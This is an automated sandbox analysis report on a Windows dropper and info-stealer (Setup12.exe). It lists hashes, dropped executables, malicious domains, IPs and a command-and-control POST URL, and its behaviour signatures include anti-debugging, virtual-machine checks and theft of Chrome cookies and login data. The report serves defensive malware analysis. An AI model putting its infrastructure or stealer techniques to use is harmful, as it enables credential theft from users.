Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 7, 2021, 4:39 p.m.	Oct. 7, 2021, 4:43 p.m.

Size	981.4KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f80a018bd3f70c14370944063f413f73`
SHA256	`8d96c34dabddb7da32757267f9b3c0a97bad862697853baf2d61414337b17d3b`
CRC32	`1E8F4533`
ssdeep	`24576:pAT8QE+kdaRh0ShqDCXrSOIjQywT/W1Nmgd4t+F:pAI+CwcCXrSR6TSNTXF`
Yara	PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library

Setup12.exe "C:\Users\test22\AppData\Local\Temp\Setup12.exe"
2020
- cm3.exe "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
  1460
- inst002.exe "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
  1148
- DownFlSetup999.exe "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
  932
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
premium-s0ftwar3875.bar	A 35.205.61.67	35.205.61.67
auto-repair-solutions.bar
staticimg.youtuuee.com	A 45.136.151.102	45.136.151.102
onepremiumstore.bar
guidereviews.bar
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
162.0.210.44	Active	Moloch
162.0.214.42	Active	Moloch
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
35.205.61.67	Active	Moloch
45.136.151.102	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49170 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 7, 2021, 4:39 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Oct. 7, 2021, 4:39 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 7, 2021, 4:39 p.m.			0	0
IsDebuggerPresent Oct. 7, 2021, 4:39 p.m.			0	0
IsDebuggerPresent Oct. 7, 2021, 4:39 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

file	c:\program files (x86)\Google\Chrome\application\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 7, 2021, 4:39 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://staticimg.youtuuee.com/api/?sid=264745&key=b0e4ab29eda1494875bb14e22a119cc5

Performs some HTTP requests (3 events)

request	GET http://ip-api.com/json/
request	GET http://staticimg.youtuuee.com/api/fbtime
request	POST http://staticimg.youtuuee.com/api/?sid=264745&key=b0e4ab29eda1494875bb14e22a119cc5

Sends data using the HTTP POST Method (1 event)

request

POST http://staticimg.youtuuee.com/api/?sid=264745&key=b0e4ab29eda1494875bb14e22a119cc5

Allocates read-write-execute memory (usually to unpack itself) (50 out of 59 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 2020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737d2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 2020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733c3000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 1148 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 1148 region_size: 61440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00360000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 1148 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef196b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ad0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef12d4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000010b2000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 7, 2021, 4:39 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Oct. 7, 2021, 4:40 p.m.	total_number_of_free_bytes: 10933555200 free_bytes_available: 10933555200 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Steals private information from local Internet browsers (50 out of 105 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (4 events)

file	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
file	C:\Program Files (x86)\Company\NewProduct\inst002.exe
file	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
file	C:\Program Files (x86)\Company\NewProduct\cm3.exe

Creates a shortcut to an executable file (12 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk

Drops a binary and executes it (3 events)

file	C:\Program Files (x86)\Company\NewProduct\cm3.exe
file	C:\Program Files (x86)\Company\NewProduct\inst002.exe
file	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 7, 2021, 4:39 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Company\NewProduct\cm3.exe parameters: filepath: C:\Program Files (x86)\Company\NewProduct\cm3.exe	1	1
ShellExecuteExW Oct. 7, 2021, 4:39 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Company\NewProduct\inst002.exe parameters: filepath: C:\Program Files (x86)\Company\NewProduct\inst002.exe	1	1
ShellExecuteExW Oct. 7, 2021, 4:39 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe parameters: filepath: C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 7, 2021, 4:39 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (8 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 7, 2021, 4:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1

Communicates with host for which no DNS query was performed (2 events)

host	162.0.210.44
host	162.0.214.42

File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)

Lionic	Trojan.Win32.Fabookie.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Cerbu.112705
CAT-QuickHeal	Trojan.IGENERIC
McAfee	Artemis!F80A018BD3F7
Cylance	Unsafe
Sangfor	Trojan.Win32.Fabookie.za
K7AntiVirus	Trojan ( 00581cad1 )
K7GW	Trojan ( 00581cad1 )
Arcabit	Trojan.Cerbu.D1B841
Cyren	W64/Trojan.JGWK-8269
Symantec	Trojan.Gen.MBT
ESET-NOD32	multiple detections
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan.Win32.Fabookie.za
BitDefender	Gen:Variant.Cerbu.112705
NANO-Antivirus	Virus.Win32.Gen-Crypt.ccnc
SUPERAntiSpyware	Trojan.Agent/Gen-Dropper
Avast	Win64:Trojan-gen
Sophos	Mal/Generic-R
DrWeb	Trojan.MulDrop16.31196
McAfee-GW-Edition	RDN/Redline
FireEye	Generic.mg.f80a018bd3f70c14
Emsisoft	Trojan.GenericKD.46999474 (B)
Ikarus	Trojan.Win32.Crypt
Webroot	W32.Trojan.Gen
Avira	TR/Agent.owflj
MAX	malware (ai score=89)
Antiy-AVL	Trojan/Generic.ASMalwS.34A04CA
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.CoinMiner.vb!s8
Microsoft	Trojan:Win64/Fabookie.WY!MTB
GData	Trojan.GenericKD.37692310
Cynet	Malicious (score: 99)
BitDefenderTheta	Gen:NN.ZexaF.34170.ny0@a8iWUxoi
ALYac	Trojan.GenericKD.37692310
TrendMicro-HouseCall	TROJ_GEN.R002C0PJ421
Tencent	Win32.Trojan.Fabookie.Ebgk
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
Fortinet	W32/Agent.BHTB!tr
AVG	Win64:Trojan-gen
Panda	Trj/CI.A
CrowdStrike	win/malicious_confidence_60% (W)
MaxSecure	Trojan-Ransom.Win32.Crypmod.zfq

